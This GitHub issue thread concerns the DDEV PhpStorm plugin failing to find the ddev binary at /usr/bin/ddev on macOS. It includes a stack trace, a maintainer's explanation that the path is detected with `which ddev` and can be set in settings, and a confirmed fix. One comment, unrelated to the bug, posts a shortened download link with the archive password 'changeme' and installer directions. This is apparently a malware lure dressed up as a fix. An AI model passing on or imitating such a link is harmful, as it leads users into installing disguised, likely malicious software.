### ISSUE TITLE
/usr/bin/ddev doesn't exist

### ISSUE THREAD

**Issue by kirk-brown-ew** [php-perfect/ddev-intellij-plugin#363]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Are you sure that this bug is related to this DDEV Integration Plugin?

- [X] I am sure

### Describe the bug

/opt/homebrew/bin/ddev is the correct location on my MacOS.

When I launch PHPStorm, I get an error stating this module can't run /usr/bin/ddev.  

Perhaps you want to run `which ddev` before using it.

### Steps to reproduce

1. On a Mac, open a project in PHPStorm.
2. Error will present itself.

### Additional context

This is the IDE Internal Error that gets reported:

com.google.common.util.concurrent.UncheckedExecutionException: com.intellij.execution.process.ProcessNotCreatedException: Cannot run program "/usr/bin/ddev" (in directory "/Users/kirkbrown/EW/cadth/cadth-main"): error=2, No such file or directory
	at de.php_perfect.intellij.ddev.cmd.ProcessExecutorImpl.lambda$executeCommandLine$0(ProcessExecutorImpl.java:31)
	at com.intellij.openapi.progress.impl.CoreProgressManager.lambda$runProcess$2(CoreProgressManager.java:217)
	at com.intellij.openapi.progress.impl.CoreProgressManager.lambda$executeProcessUnderProgress$13(CoreProgressManager.java:660)
	at com.intellij.openapi.progress.impl.CoreProgressManager.registerIndicatorAndRun(CoreProgressManager.java:735)
	at com.intellij.openapi.progress.impl.CoreProgressManager.computeUnderProgress(CoreProgressManager.java:691)
	at com.intellij.openapi.progress.impl.CoreProgressManager.executeProcessUnderProgress(CoreProgressManager.java:659)
	at com.intellij.openapi.progress.impl.ProgressManagerImpl.executeProcessUnderProgress(ProgressManagerImpl.java:79)
	at com.intellij.openapi.progress.impl.CoreProgressManager.runProcess(CoreProgressManager.java:202)
	at de.php_perfect.intellij.ddev.cmd.ProcessExecutorImpl.executeCommandLine(ProcessExecutorImpl.java:23)
	at de.php_perfect.intellij.ddev.cmd.DdevImpl.executePlain(DdevImpl.java:46)
	at de.php_perfect.intellij.ddev.cmd.DdevImpl.version(DdevImpl.java:23)
	at de.php_perfect.intellij.ddev.state.DdevStateManagerImpl.checkVersion(DdevStateManagerImpl.java:137)
	at de.php_perfect.intellij.ddev.state.DdevStateManagerImpl.lambda$initialize$0(DdevStateManagerImpl.java:52)
	at de.php_perfect.intellij.ddev.state.DdevStateManagerImpl.checkChanged(DdevStateManagerImpl.java:90)
	at de.php_perfect.intellij.ddev.state.DdevStateManagerImpl.initialize(DdevStateManagerImpl.java:49)
	at de.php_perfect.intellij.ddev.state.DdevStateManagerImpl.initialize(DdevStateManagerImpl.java:33)
	at de.php_perfect.intellij.ddev.InitPluginActivity.lambda$execute$0(InitPluginActivity.java:19)
	at com.intellij.openapi.application.impl.AnyThreadWriteThreadingSupport$executeOnPooledThread$1.run(AnyThreadWriteThreadingSupport.kt:134)
	at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:572)
	at com.intellij.util.concurrency.ContextCallable.call(ContextCallable.java:32)
	at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:317)
	at com.intellij.util.concurrency.ContextRunnable.run(ContextRunnable.java:27)
	at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1144)
	at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:642)
	at java.base/java.util.concurrent.Executors$PrivilegedThreadFactory$1$1.run(Executors.java:735)
	at java.base/java.util.concurrent.Executors$PrivilegedThreadFactory$1$1.run(Executors.java:732)
	at java.base/java.security.AccessController.doPrivileged(AccessController.java:400)
	at java.base/java.util.concurrent.Executors$PrivilegedThreadFactory$1.run(Executors.java:732)
	at java.base/java.lang.Thread.run(Thread.java:1583)
Caused by: com.intellij.execution.process.ProcessNotCreatedException: Cannot run program "/usr/bin/ddev" (in directory "/Users/kirkbrown/EW/cadth/cadth-main"): error=2, No such file or directory
	at com.intellij.execution.configurations.GeneralCommandLine.createProcess(GeneralCommandLine.java:384)
	at com.intellij.execution.process.OSProcessHandler.startProcess(OSProcessHandler.java:85)
	at com.intellij.execution.process.OSProcessHandler.<init>(OSProcessHandler.java:45)
	at com.intellij.execution.process.CapturingProcessHandler.<init>(CapturingProcessHandler.java:20)
	at de.php_perfect.intellij.ddev.cmd.ProcessExecutorImpl.lambda$executeCommandLine$0(ProcessExecutorImpl.java:25)
	... 28 more
Caused by: java.io.IOException: Cannot run program "/usr/bin/ddev" (in directory "/Users/kirkbrown/EW/cadth/cadth-main"): error=2, No such file or directory
	at java.base/java.lang.ProcessBuilder.start(ProcessBuilder.java:1170)
	at java.base/java.lang.ProcessBuilder.start(ProcessBuilder.java:1089)
	at com.intellij.execution.configurations.GeneralCommandLine.createProcess(GeneralCommandLine.java:463)
	at com.intellij.execution.configurations.GeneralCommandLine.startProcess(GeneralCommandLine.java:469)
	at com.intellij.execution.configurations.GeneralCommandLine.createProcess(GeneralCommandLine.java:374)
	... 32 more
Caused by: java.io.IOException: error=2, No such file or directory
	at java.base/java.lang.ProcessImpl.forkAndExec(Native Method)
	at java.base/java.lang.ProcessImpl.<init>(ProcessImpl.java:295)
	at java.base/java.lang.ProcessImpl.start(ProcessImpl.java:225)
	at java.base/java.lang.ProcessBuilder.start(ProcessBuilder.java:1126)
	... 36 more

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by alex-mora** [comment]
In my case is /usr/local/bin/ddev

**Comment by AkibaAT** [comment]
There are no hardcoded paths to ddev in the plugin. The binary location is detected single time per project by running `which ddev` and storing the output:
![image](https://github.com/user-attachments/assets/fa439af1-4cdc-45ad-82c6-26715b6b47ff)

After the initial detection, the binary location can be manually set in the project settings:
![image](https://github.com/user-attachments/assets/64c07425-3705-46bf-b63e-7e4ff536245f)

Tested on MacOS with plugin version 1.2.4.

**Comment by kirk-brown-ew** [comment]
I wonder why my instance was wrong.  It worked for a long time, then it switched.

I've updated the path and it's working.
